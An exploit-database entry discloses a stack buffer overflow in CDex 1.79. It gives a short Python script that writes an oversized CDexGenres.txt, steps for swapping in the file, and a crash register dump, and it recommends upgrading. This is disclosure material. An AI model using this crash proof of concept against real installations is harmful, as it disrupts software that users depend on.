header-logo
Suggest Exploit
vendor:
CDex
by:
Un_N0n
7,8
CVSS
HIGH
Stack-based-BOF
119
CWE
Product Name: CDex
Affected Version From: 1.79
Affected Version To: 1.79
Patch Exists: YES
Related CWE: N/A
CPE: a:cdex:cdex:1.79
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 x86(32 BIT)
2015

CDex Genre Stack Buffer Overflow

A stack-based buffer overflow vulnerability exists in CDex version 1.79. An attacker can exploit this vulnerability by generating a file using the python code provided and replacing the old CDexGenres.txt with the new one. This will cause the application to crash.

Mitigation:

Upgrade to the latest version of CDex
Source

Exploit-DB raw data:

'''
********************************************************************************************
# Exploit Title: CDex Genre Stack Buffer Overflow
# Date: 10/9/2015
# Exploit Author: Un_N0n
# Software Link: http://cdex.mu/download
# Version: 1.79
# Tested on: Windows 7 x86(32 BIT)
********************************************************************************************
[Steps to Produce the Crash]:
1- Generate a File by python code mentioned below.
2- Goto C:\Users\YourUsername\AppData\Local\CDex\LocalCDDB
3- Replace the Old CDexGenres.txt with New CDexGenres.txt which is 
   Produced by Python Code.
4- Open Up CDex.exe.
~Software will crash.

On Further Analysis, We come to know that it is Stack-based-BOF.

[REG-DUMP]:
EAX 00000000
ECX 779DD018 ASCII "\r\nSTATUS_STACK_BUFFER_OVERRUN encountered\r\n" //May be handled but yet application crashes.
EDX 0012F1A1 ASCII 0A,"STATUS_STA"
EBX 00749338 CDex.00749338
ESP 0012F3E8
EBP 0012F464
ESI 00000000
EDI 002C7AC8

EIP 779DCE96 kernel32.779DCE96

0012F3F4   002C7AC8
0012F3F8   002E25F8  ASCII "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>
0012F3FC   002E5FD8
0012F400   002E44A0
0012F404   000003F8
0012F408   0000007F
0012F40C   0012F504
0012F410   00260000
0012F414   77C97B89  RETURN to ntdll.77C97B89 from ntdll.RtlFillMemoryUlong
0012F418   002E2580  ASCII "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx>
0012F41C   00001190
'''

[Code to produce CDexGenres.txt]
buffer = "A"*66666
file = "CDexGenres.txt"
f = open(file,'w')
f.write(buffer)
f.close()
'''
**********************************************************************************************
'''

Navigation

Suggest Exploit

Services By CQR